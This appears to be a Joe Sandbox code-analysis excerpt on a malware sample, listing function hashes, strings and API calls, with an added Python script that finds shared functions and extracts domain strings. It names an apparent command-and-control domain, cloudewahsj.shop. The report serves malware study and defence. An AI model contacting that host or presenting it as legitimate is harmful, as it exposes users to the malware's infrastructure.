• Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
• Instruction ID: 3bb93ed39ade15dcd0c028bcf00f8428444c74c2e92410a49938f99d6fbf0c98
• Instruction Fuzzy Hash: 266224726583508FE724CF28D8817ABBBE1EFC5314F19892CE5D58B390D7799809CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
• API String ID: 0-2465278142
• Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
• Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
• Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
• API String ID: 0-2342033412
• Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
• Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
• Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$&$5$A$J$t
                                                                              • API String ID: 0-1619763526
                                                                              • Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                                              • Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
                                                                              • Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                                              • Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$&$5$A$J$t
                                                                              • API String ID: 0-1619763526
                                                                              • Opcode ID: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
                                                                              • Instruction ID: 412ecb98d645afef7d731c9e09e6a09523f2ed8f8794b25d63b7f14b421a2290
                                                                              • Opcode Fuzzy Hash: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
                                                                              • Instruction Fuzzy Hash: 1F229E7160C7808FC7649B38C4943AEBBE1AF95324F198A2DE9EA877C1D7748941DB42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
                                                                              • API String ID: 0-4113535514
                                                                              • Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                                                              • Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
                                                                              • Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                                                              • Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                              • API String ID: 3861434553-1392773931
                                                                              • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
                                                                              • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
                                                                              • API String ID: 3861434553-1392773931
                                                                              • Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction ID: b67dcc53e1f5b9a9046d342083c3438ea7ed314a732bca0f0875777a6fefb21c
                                                                              • Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
                                                                              • Instruction Fuzzy Hash: 92C1207150C3C08FDB358F24C8687ABBBE1AFD2314F08496CD4DA5B286D778450ACB96
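The two entries above record the same Opcode ID (9bb15100…) in two different memory regions, the 00400000 PE image and the 020E0000 non-PE region, with a different Instruction ID in each, and both carry the domain cloudewahsj.shop in their String ID list. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in this report's layout, lists Opcode IDs seen in more than one region, and pulls domain-like strings out of the String ID lists. The parsing rules (an entry begins at a "Memory Dump Source" line, String ID values are "$"-separated) are assumptions read off this page, and the embedded sample is the two entries above copied verbatim.

```python
import re
from collections import defaultdict

# Sample input: the two entries for Opcode ID 9bb15100... copied from this
# report (one from the 00400000 PE image, one from the 020E0000 region).
SAMPLE = """APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: Uninitialize
• String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
• API String ID: 3861434553-1392773931
• Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
• Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
• Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
• Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
• API String ID: 3861434553-1392773931
• Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
• Instruction ID: b67dcc53e1f5b9a9046d342083c3438ea7ed314a732bca0f0875777a6fefb21c
• Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
• Instruction Fuzzy Hash: 92C1207150C3C08FDB358F24C8687ABBBE1AFD2314F08496CD4DA5B286D778450ACB96
"""

FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")          # "• Key: Value" bullet lines
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")  # crude DNS-name shape


def parse_entries(text):
    """Return one dict per function entry. Assumption: every entry in this
    report layout is introduced by a 'Memory Dump Source' line."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        current[key] = value
        if key == "Source File":
            om = OFFSET_RE.search(value)
            if om:
                current["offset"] = om.group(1).upper()
                current["based_on_pe"] = om.group(2) == "true"
    return entries


def split_string_ids(entry):
    """'$' separates strings in a String ID list; a literal '$' string cannot
    be told apart from the separator, so empty pieces are simply dropped."""
    return [s for s in entry.get("String ID", "").split("$") if s]


def shared_functions(entries):
    """Opcode IDs seen in more than one memory region -> sorted list of offsets."""
    seen = defaultdict(set)
    for e in entries:
        if "Opcode ID" in e and "offset" in e:
            seen[e["Opcode ID"]].add(e["offset"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def instruction_ids_for(entries, opcode_id):
    """Instruction ID recorded for one Opcode ID in each region, keyed by offset."""
    return {e["offset"]: e["Instruction ID"] for e in entries
            if e.get("Opcode ID") == opcode_id and "offset" in e}


def domain_strings(entries):
    """Every String ID element that looks like a DNS name (candidate C2 hosts)."""
    return {s for e in entries for s in split_string_ids(e) if DOMAIN_RE.match(s)}


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for op, offs in shared_functions(ents).items():
        ids = instruction_ids_for(ents, op)
        print(op[:16], "seen at", offs, "instruction IDs", {k: v[:8] for k, v in ids.items()})
    print("domain-like strings:", sorted(domain_strings(ents)))
```

Run on the rest of this report's Code Analysis section, the same three functions give a quick view of which functions the 020E0000 region shares with the original image and which String ID lists carry hostnames, without hand-scanning every entry.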
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                              • API String ID: 0-3323421312
                                                                              • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                              • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                                                              • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                                                              • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                              • API String ID: 0-3323421312
                                                                              • Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                              • Instruction ID: 265cdfc16e3511ba22bfdc361cc743bcdb55910c342fa917b97e302e0b98687b
                                                                              • Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                              • Instruction Fuzzy Hash: DAD1117150C3808FDB25CF29889036BBBE2BFD160CF08892CE4E65B345D776854ADB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                              • API String ID: 0-1466227541
                                                                              • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                                                              • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                              • API String ID: 0-1466227541
                                                                              • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction ID: 009b78caf145602bb3de88dbbd43aaa64ced3417470bbf3da46bf7fdccf51cee
                                                                              • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                              • Instruction Fuzzy Hash: 8071033058C3C68ED7118F76C4A076BFFE0AF92344F18496CE8E14B291D3798149EB56
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: *$*$q
                                                                              • API String ID: 237503144-4001757600
                                                                              • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                              • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                                                              • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                              • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !@$,$0$6$p$q$v
                                                                              • API String ID: 0-585546663
                                                                              • Opcode ID: 2e7f69736473084efa3132fe79f0750aac7e3de4be733c7d81ca4ce4f9e6d1fa
                                                                              • Instruction ID: d2da6f60e0df82352be2d3e895d7fe62a647346e5e4daae969a45d2be3b1464b
                                                                              • Opcode Fuzzy Hash: 2e7f69736473084efa3132fe79f0750aac7e3de4be733c7d81ca4ce4f9e6d1fa
                                                                              • Instruction Fuzzy Hash: A2229F7164C7408FD3289F28C49876EBBE2BB85314F158A2DE9E9C73D1D7B98845CB42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                              • API String ID: 0-2829372548
                                                                              • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
                                                                              • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                                                              • API String ID: 0-2829372548
                                                                              • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction ID: d7eb0b9bf061da89c4d4779840249716a71030cb1bf12fc3624199596e283d06
                                                                              • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                                                              • Instruction Fuzzy Hash: FBD1F67160C7918FD72ACF29C85136BBFE1AF97218F0889ADD0D6CB282D7398549C752
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1006321803-0
                                                                              • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                              • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                                                              • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                                                              • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >$A$O$f$g$j$q
                                                                              • API String ID: 0-654885204
                                                                              • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
                                                                              • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >$A$O$f$g$j$q
                                                                              • API String ID: 0-654885204
                                                                              • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction ID: 50bfd1a502e39c2c2a08f8df3c99edf390dcfc5986df542f6e9953db3c224308
                                                                              • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                                                              • Instruction Fuzzy Hash: 71D1F633A4CBD04AD328853C885539BAED25BD2224F1D8B7EE9F5C73C6D67988058393
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020F80D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 7$TW$WH$}&'$
                                                                              • API String ID: 237503144-3022637246
                                                                              • Opcode ID: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                              • Instruction ID: d9cca356b2004e85a1960bbc8b9e83d62199e10724d69eab686782ffbc5a0469
                                                                              • Opcode Fuzzy Hash: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                              • Instruction Fuzzy Hash: 7691F275A483528BC354CF28C89036BBBE2FFD8354F288A1CE5C54BB65E3788945DB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                                                              • API String ID: 0-4062276182
                                                                              • Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                                              • Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
                                                                              • Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                                                              • Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 020E8CEB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 020E8CF5
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020E8DDD
                                                                              • GetForegroundWindow.USER32 ref: 020E8DF2
                                                                              • ExitProcess.KERNEL32 ref: 020E8F6E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                              • Instruction ID: 5334e55eef7e5121d4a65acc5c215616f70d8f6a9c713780899dc1dabcc19eda
                                                                              • Opcode Fuzzy Hash: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                              • Instruction Fuzzy Hash: D4618873B143144FD718AE799C0639AB6C39BC5710F0FC63DD986EB7A0EA7888069385
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                              • API String ID: 0-3469842109
                                                                              • Opcode ID: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                                                              • Instruction ID: 828f2798e7534a509cb653a25c5a447f63e0741c52f375536a6b9b324fae408e
                                                                              • Opcode Fuzzy Hash: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                                                              • Instruction Fuzzy Hash: 5E02E3B46043808FD700DF29D89075ABBE1EBD6304F05897EEA859B3D1D379D909CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                              • API String ID: 0-3469842109
                                                                              • Opcode ID: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
                                                                              • Instruction ID: 9f8138ba0c061efcb83b6a54f3847c26f37c2beb9293873ba60765052eeaa2f1
                                                                              • Opcode Fuzzy Hash: 6dda164276c19b2348408bf08e15d5684114f8bdc5157cb020ecd11399e8153b
                                                                              • Instruction Fuzzy Hash: 270225B06083808FDB10CF29D89076BBBE1FF96304F05856DE9868B391D376D949DB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 50$DM_e$FwPq$Js$'!
                                                                              • API String ID: 0-1711485358
                                                                              • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction ID: 3123bf915e43bb5cc4629facff2eb9b84256f607e2857da94b3e62b158993021
                                                                              • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                              • Instruction Fuzzy Hash: 4B51DAB45493808FE338CF25C991B8BBBB1BBA1304F609A0CE6D95B254CB759446CF97
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A039
                                                                                • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                              Strings
                                                                              Memory Dump Source
